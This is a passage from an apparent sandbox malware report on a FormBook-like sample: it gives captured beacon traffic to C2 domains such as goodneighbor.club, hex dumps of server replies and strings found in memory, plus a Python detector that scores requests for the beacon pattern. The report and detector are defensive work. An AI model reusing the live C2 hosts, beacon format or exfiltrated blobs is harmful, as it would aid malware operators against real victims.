7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66 Data Ascii: zn6L=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 17:00:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a4bca56190a5e79-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxlNXrqfOuB%2BawULHB9tMokoe6PzNKmsLm2S6B%2BPVr1WB8HB2pQrPV1X2eV6fMyXy1wmKpJjzH8ZEmF6NGa%2FMShZouBlSXZEv3oIXDD%2FR6ivoejc11vdZpSItyxsiyVZpfs7%2BQ14TQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45 Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 17:00:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a4bca65d82f4289-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFWNvrC5c4AaydgJGcM3xjuVOI%2Bue9WQfJmghbuJ%2BG%2F5wfbCVF%2BoHGMK2ArWaNdAlyUy0XvvJQALxXPEltDNjp47CzB6vBDmMH0%2BVk00G%2F0hYZIoBUr0CuIwF2KCZLUBhIEJBms%2BbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~
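                The two requests captured above share one shape: a single short directory as the whole path (/qt04/, /d3vb/), one four-character parameter (zn6L) carrying a long base64-looking blob, a hard-coded Firefox/40.0-on-Windows-7 user agent, Connection: close, and on the POST an Origin/Referer that point back at the same path. The script below is an added triage example, not part of the Joe Sandbox report and not code from the sample; it scores captured requests against that shape. The two malicious inputs are copied from the traffic lines above, the third request is a constructed benign one for contrast, and the indicator names, the minimum blob length and the alert threshold of three indicators are the author's own choices.

```python
"""
Added triage example (not Joe Sandbox code): score captured HTTP requests for the
FormBook-style beacon shape seen in the report above. Thresholds and indicator
names are the author's own. Request parsing avoids urllib.parse_qs because it
turns the raw '+' inside the base64 blob into a space.
"""
import re
from urllib.parse import urlsplit, unquote

# Constructed input: the GET and POST copied from the traffic section, plus one
# benign request that is not from the report.
SAMPLE_REQUESTS = [
    {"method": "GET",
     "target": "/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-l",
     "headers": {"Host": "www.goodneighbor.club", "Connection": "close",
                 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"},
     "body": ""},
    {"method": "POST",
     "target": "/d3vb/",
     "headers": {"Host": "www.ancuapengiu28.com", "Origin": "http://www.ancuapengiu28.com",
                 "Referer": "http://www.ancuapengiu28.com/d3vb/", "Connection": "close",
                 "Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"},
     "body": "zn6L=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf"},
    {"method": "GET",  # benign contrast, constructed
     "target": "/search?q=weather&lang=en",
     "headers": {"Host": "www.example.org", "Connection": "keep-alive",
                 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/127.0"},
     "body": ""},
]

SHORT_DIR = re.compile(r"^/[a-z0-9]{2,6}/$")            # e.g. /qt04/, /d3vb/
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")           # plain (not URL-safe) base64 alphabet
LEGACY_UA = re.compile(r"Windows NT 6\.1; WOW64; rv:40\.0\) Gecko/20100101 Firefox/40\.0$")
MIN_BLOB = 64           # assumption: anything shorter is not an encrypted payload
BEACON_THRESHOLD = 3    # assumption: alert on three independent indicators


def split_form(data):
    """Parse k=v&k=v keeping values verbatim ('+' and '/' are part of the blob)."""
    out = {}
    for pair in data.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            out[unquote(key)] = val
    return out


def score_request(req):
    """Return (score, reasons); each reason is one indicator of the beacon shape."""
    reasons = []
    url = urlsplit(req["target"])
    headers = req["headers"]
    if SHORT_DIR.match(url.path):
        reasons.append("single short directory as the whole path")
    params = split_form(url.query if req["method"] == "GET" else req["body"])
    for key, val in params.items():
        if len(key) == 4 and len(val) >= MIN_BLOB and B64ISH.match(val):
            reasons.append(f"base64-like blob under 4-char key {key!r}")
            break
    if LEGACY_UA.search(headers.get("User-Agent", "")):
        reasons.append("hard-coded Firefox/40.0 on Windows 7 user agent")
    if headers.get("Connection", "").lower() == "close":
        reasons.append("Connection: close")
    if req["method"] == "POST":
        host = headers.get("Host", "")
        if headers.get("Origin", "").endswith(host) and headers.get("Referer", "").endswith(url.path):
            reasons.append("Origin/Referer point back at the C2 path itself")
    return len(reasons), reasons


def flag_beacons(requests, threshold=BEACON_THRESHOLD):
    """Return (host, path) for every request scoring at or above the threshold."""
    hits = []
    for req in requests:
        score, _ = score_request(req)
        if score >= threshold:
            hits.append((req["headers"].get("Host", ""), urlsplit(req["target"]).path))
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["method"], req["headers"]["Host"], *score_request(req))
    print("beacons:", flag_beacons(SAMPLE_REQUESTS))
```

                Run against the captured traffic this yields two beacons, www.goodneighbor.club /qt04/ and www.ancuapengiu28.com /d3vb/, and nothing for the benign request. Note that the DNS section resolves five www.* domains but only two of them carry HTTP in the capture; treat all five as indicators, and do not read the 404 responses above as the C2 being dead: the POST with the encrypted blob still left the host regardless of what the server answered.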
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: runas.exe, 00000011.00000002.3358247281.000000000539A000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000002.3357539718.000000000322A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2180682154.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, GDhinOc.exe, 00000008.00000002.2407319175.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: hAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club
                Source: hAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club/qt04/
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
